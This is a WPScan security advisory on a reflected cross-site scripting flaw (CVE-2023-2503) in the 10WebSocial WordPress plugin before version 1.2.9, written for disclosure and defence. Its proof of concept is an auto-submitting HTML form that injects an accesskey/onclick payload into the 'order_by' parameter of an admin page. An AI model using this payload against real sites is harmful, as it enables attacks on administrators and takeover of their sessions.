WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

10WebSocial < 1.2.9 - Reflected XSS

Description

The plugin does not sanitise and escape some parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=info_ffwd" method="POST">
      <input type="hidden" name="order_by" value='" accesskey=X onclick=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X

Affects Plugins

wd-facebook-feed
Fixed in version 1.2.9

References

CVE
CVE-2023-2503

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID
07b1caf1-d00b-4075-b71a-0516d5604286

Timeline

Publicly Published

2023-05-11 (about 4 months ago)

Added

2023-05-11 (about 4 months ago)

Last Updated

2023-05-11 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin